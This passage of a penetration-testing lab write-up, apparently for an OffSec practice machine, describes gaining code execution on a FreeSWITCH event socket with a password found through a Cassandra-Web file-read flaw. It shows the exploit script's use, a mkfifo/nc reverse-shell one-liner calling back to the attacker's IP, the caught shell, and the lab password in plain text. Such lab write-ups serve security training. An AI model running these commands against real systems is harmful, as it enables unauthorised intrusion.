RCE
The target FreeSWITCH instance has the mod_event_socket module installed and running on the target port 8021. It was suspected that the target instance was vulnerable to CVE-2019-19492 due to the default password exposure from the backup Samba share. However, it turned out to be false during testing. Leveraging the remote file read vulnerability for the target Cassandra-Web instance, I was able to locate the real password; StrongClueConEight021. The exploit script was updated.
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/clue]
└─$ python3 freeswitch-rce.py $IP id
Authenticated
Content-Type: api/response
Content-Length: 63
uid=998(freeswitch) gid=998(freeswitch) groups=998(freeswitch)Command execution confirmed
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/clue]
└─$ python3 freeswitch-rce.py $IP 'mkfifo /tmp/ypzdi; nc 192.168.45.192 8021 0</tmp/ypzdi | /bin/sh >/tmp/ypzdi 2>&1; rm /tmp/ypzdi'
AuthenticatedSending the payload
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/clue]
└─$ nnc 8021
listening on [any] 8021 ...
connect to [192.168.45.192] from (UNKNOWN) [192.168.220.240] 36760
whoami
freeswitch
hostname
clue
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
3: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:50:56:9e:77:65 brd ff:ff:ff:ff:ff:ff
inet 192.168.220.240/24 brd 192.168.220.255 scope global ens192
valid_lft forever preferred_lft foreverInitial Foothold established to the target system as the freeswitch account